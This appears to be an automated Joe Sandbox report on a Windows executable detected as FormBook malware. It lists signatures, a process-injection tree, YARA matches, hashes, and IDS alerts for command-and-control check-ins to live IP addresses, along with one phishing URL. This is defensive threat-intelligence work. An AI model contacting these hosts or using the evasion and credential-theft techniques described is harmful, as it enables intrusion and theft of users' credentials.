Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe

Overview

General Information

Sample name:z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe
Analysis ID:1576360
MD5:31141591ad5afa58b5fdc07ac96c8fff
SHA1:7b14895f60db4e854feb05a7976e828ba5d343d0
SHA256:ec78e291d04cd9a16f93570bdee2de454471c35006a50f4b766cece15e011b78
Tags:exeuser-Porcupine
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe (PID: 3292 cmdline: "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe" MD5: 31141591AD5AFA58B5FDC07AC96C8FFF)
    • svchost.exe (PID: 1480 cmdline: "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ASmwljQNPNM.exe (PID: 3092 cmdline: "C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ReAgentc.exe (PID: 6640 cmdline: "C:\Windows\SysWOW64\ReAgentc.exe" MD5: 1C8ED08C898D73964B98AAA5F06A0F63)
          • ASmwljQNPNM.exe (PID: 2704 cmdline: "C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1488 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.2303693143.0000000002990000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4582561177.00000000040D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4584397625.0000000005620000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.4582603239.0000000004120000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.4582671918.0000000003830000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.4e0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.4e0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe", CommandLine: "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe", ParentImage: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, ParentProcessId: 3292, ParentProcessName: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, ProcessCommandLine: "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe", ProcessId: 1480, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe", CommandLine: "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe", ParentImage: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, ParentProcessId: 3292, ParentProcessName: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, ProcessCommandLine: "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe", ProcessId: 1480, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T22:03:51.295609+010020181411A Network Trojan was detected18.143.155.6380192.168.2.549936TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T22:02:37.816421+010028554651A Network Trojan was detected192.168.2.549754194.245.148.18980TCP
                2024-12-16T22:03:03.830114+010028554651A Network Trojan was detected192.168.2.54981347.83.1.9080TCP
                2024-12-16T22:03:19.923385+010028554651A Network Trojan was detected192.168.2.54985747.83.1.9080TCP
                2024-12-16T22:03:35.140692+010028554651A Network Trojan was detected192.168.2.54989784.32.84.3280TCP
                2024-12-16T22:03:51.172971+010028554651A Network Trojan was detected192.168.2.54993618.143.155.6380TCP
                2024-12-16T22:04:06.364704+010028554651A Network Trojan was detected192.168.2.549974104.21.64.20880TCP
                2024-12-16T22:04:22.543837+010028554651A Network Trojan was detected192.168.2.549998160.25.166.12380TCP
                2024-12-16T22:04:37.299399+010028554651A Network Trojan was detected192.168.2.550002209.74.79.4180TCP
                2024-12-16T22:05:01.504074+010028554651A Network Trojan was detected192.168.2.550006202.95.11.11080TCP
                2024-12-16T22:05:16.786054+010028554651A Network Trojan was detected192.168.2.55001052.223.13.4180TCP
                2024-12-16T22:05:31.538892+010028554651A Network Trojan was detected192.168.2.550014199.59.243.22780TCP
                2024-12-16T22:05:47.024470+010028554651A Network Trojan was detected192.168.2.550018156.226.63.1380TCP
                2024-12-16T22:06:02.459434+010028554651A Network Trojan was detected192.168.2.550022162.218.30.23580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-16T22:02:55.117384+010028554641A Network Trojan was detected192.168.2.54979547.83.1.9080TCP
                2024-12-16T22:02:57.773420+010028554641A Network Trojan was detected192.168.2.54980147.83.1.9080TCP
                2024-12-16T22:03:00.429783+010028554641A Network Trojan was detected192.168.2.54980747.83.1.9080TCP
                2024-12-16T22:03:11.132630+010028554641A Network Trojan was detected192.168.2.54983547.83.1.9080TCP
                2024-12-16T22:03:13.851422+010028554641A Network Trojan was detected192.168.2.54984147.83.1.9080TCP
                2024-12-16T22:03:16.523291+010028554641A Network Trojan was detected192.168.2.54984747.83.1.9080TCP
                2024-12-16T22:03:27.043223+010028554641A Network Trojan was detected192.168.2.54987484.32.84.3280TCP
                2024-12-16T22:03:29.809419+010028554641A Network Trojan was detected192.168.2.54988484.32.84.3280TCP
                2024-12-16T22:03:32.469420+010028554641A Network Trojan was detected192.168.2.54989184.32.84.3280TCP
                2024-12-16T22:03:42.523243+010028554641A Network Trojan was detected192.168.2.54991318.143.155.6380TCP
                2024-12-16T22:03:45.242141+010028554641A Network Trojan was detected192.168.2.54992018.143.155.6380TCP
                2024-12-16T22:03:47.976746+010028554641A Network Trojan was detected192.168.2.54992918.143.155.6380TCP
                2024-12-16T22:03:58.257694+010028554641A Network Trojan was detected192.168.2.549952104.21.64.20880TCP
                2024-12-16T22:04:00.916360+010028554641A Network Trojan was detected192.168.2.549961104.21.64.20880TCP
                2024-12-16T22:04:03.597403+010028554641A Network Trojan was detected192.168.2.549968104.21.64.20880TCP
                2024-12-16T22:04:14.460748+010028554641A Network Trojan was detected192.168.2.549994160.25.166.12380TCP
                2024-12-16T22:04:17.132760+010028554641A Network Trojan was detected192.168.2.549996160.25.166.12380TCP
                2024-12-16T22:04:19.804854+010028554641A Network Trojan was detected192.168.2.549997160.25.166.12380TCP
                2024-12-16T22:04:29.301076+010028554641A Network Trojan was detected192.168.2.549999209.74.79.4180TCP
                2024-12-16T22:04:31.967145+010028554641A Network Trojan was detected192.168.2.550000209.74.79.4180TCP
                2024-12-16T22:04:34.707152+010028554641A Network Trojan was detected192.168.2.550001209.74.79.4180TCP
                2024-12-16T22:04:53.251237+010028554641A Network Trojan was detected192.168.2.550003202.95.11.11080TCP
                2024-12-16T22:04:55.914940+010028554641A Network Trojan was detected192.168.2.550004202.95.11.11080TCP
                2024-12-16T22:04:58.587934+010028554641A Network Trojan was detected192.168.2.550005202.95.11.11080TCP
                2024-12-16T22:05:08.792876+010028554641A Network Trojan was detected192.168.2.55000752.223.13.4180TCP
                2024-12-16T22:05:11.482422+010028554641A Network Trojan was detected192.168.2.55000852.223.13.4180TCP
                2024-12-16T22:05:14.123172+010028554641A Network Trojan was detected192.168.2.55000952.223.13.4180TCP
                2024-12-16T22:05:23.519305+010028554641A Network Trojan was detected192.168.2.550011199.59.243.22780TCP
                2024-12-16T22:05:26.224260+010028554641A Network Trojan was detected192.168.2.550012199.59.243.22780TCP
                2024-12-16T22:05:28.863200+010028554641A Network Trojan was detected192.168.2.550013199.59.243.22780TCP
                2024-12-16T22:05:38.960871+010028554641A Network Trojan was detected192.168.2.550015156.226.63.1380TCP
                2024-12-16T22:05:41.632700+010028554641A Network Trojan was detected192.168.2.550016156.226.63.1380TCP
                2024-12-16T22:05:44.304560+010028554641A Network Trojan was detected192.168.2.550017156.226.63.1380TCP
                2024-12-16T22:05:54.456999+010028554641A Network Trojan was detected192.168.2.550019162.218.30.23580TCP
                2024-12-16T22:05:57.123684+010028554641A Network Trojan was detected192.168.2.550020162.218.30.23580TCP
                2024-12-16T22:05:59.807796+010028554641A Network Trojan was detected192.168.2.550021162.218.30.23580TCP
                2024-12-16T22:06:09.354945+010028554641A Network Trojan was detected192.168.2.550023109.206.161.1580TCP
                2024-12-16T22:06:12.261079+010028554641A Network Trojan was detected192.168.2.550024109.206.161.1580TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://www.telepzow.fit/98fz/?glL=RJha4vFTfn028r748QaKWzY3zBjda9lgy5GIiv729qv2JwyeJ9FchPfcwK1GDn6Hb6aTQtRNlFd0HD7GNtrjwDfmHF/7uT8zd6XTiRBlVFtH5kS3JAR6f4NO6tJ4vxk+Qw==&UBE=olMPpNEHSAvira URL Cloud: Label: phishing
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeReversingLabs: Detection: 31%
                Source: Yara matchFile source: 2.2.svchost.exe.4e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.4e0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2303693143.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4582561177.00000000040D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4584397625.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4582603239.0000000004120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4582671918.0000000003830000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4581793209.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2303461712.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2304351781.0000000004750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeJoe Sandbox ML: detected
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: ReAgentc.pdbGCTL source: svchost.exe, 00000002.00000003.2272440534.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000003.00000002.4582278533.00000000008A8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ASmwljQNPNM.exe, 00000003.00000000.2225983344.000000000016E000.00000002.00000001.01000000.00000004.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4581792254.000000000016E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, 00000000.00000003.2127830940.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, 00000000.00000003.2128127528.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2211883990.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2210328248.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2303894609.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2303894609.000000000319E000.00000040.00001000.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000003.2306032265.000000000418B000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000003.2303680318.0000000003FDD000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4582733981.0000000004340000.00000040.00001000.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4582733981.00000000044DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, 00000000.00000003.2127830940.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, 00000000.00000003.2128127528.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2211883990.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2210328248.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2303894609.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2303894609.000000000319E000.00000040.00001000.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000003.2306032265.000000000418B000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000003.2303680318.0000000003FDD000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4582733981.0000000004340000.00000040.00001000.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4582733981.00000000044DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ReAgentc.exe, 00000004.00000002.4581949171.00000000025B9000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4583138791.000000000496C000.00000004.10000000.00040000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2596639604.0000000035A5C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ReAgentc.exe, 00000004.00000002.4581949171.00000000025B9000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4583138791.000000000496C000.00000004.10000000.00040000.00000000.sdmp, ASmwljQNPNM.exe, 00000006.00000002.4582866340.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2596639604.0000000035A5C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: ReAgentc.pdb source: svchost.exe, 00000002.00000003.2272440534.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, ASmwljQNPNM.exe, 00000003.00000002.4582278533.00000000008A8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F7445A
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7C6D1 FindFirstFileW,FindClose,0_2_00F7C6D1
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F7C75C
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F7EF95
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F7F0F2
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F7F3F3
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F737EF
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00F73B12
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F7BCBC

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49801 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49807 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49795 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49754 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49813 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49835 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49841 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49857 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49884 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49874 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49897 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49891 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49847 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49913 -> 18.143.155.63:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49920 -> 18.143.155.63:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49929 -> 18.143.155.63:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49936 -> 18.143.155.63:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49961 -> 104.21.64.208:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49968 -> 104.21.64.208:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49974 -> 104.21.64.208:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49952 -> 104.21.64.208:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50002 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 202.95.11.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 202.95.11.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50006 -> 202.95.11.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 202.95.11.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 209.74.79.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 52.223.13.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 156.226.63.13:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 162.218.30.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 162.218.30.235:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 109.206.161.15:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 160.25.166.123:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50018 -> 156.226.63.13:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 156.226.63.13:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 156.226.63.13:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50014 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 160.25.166.123:80
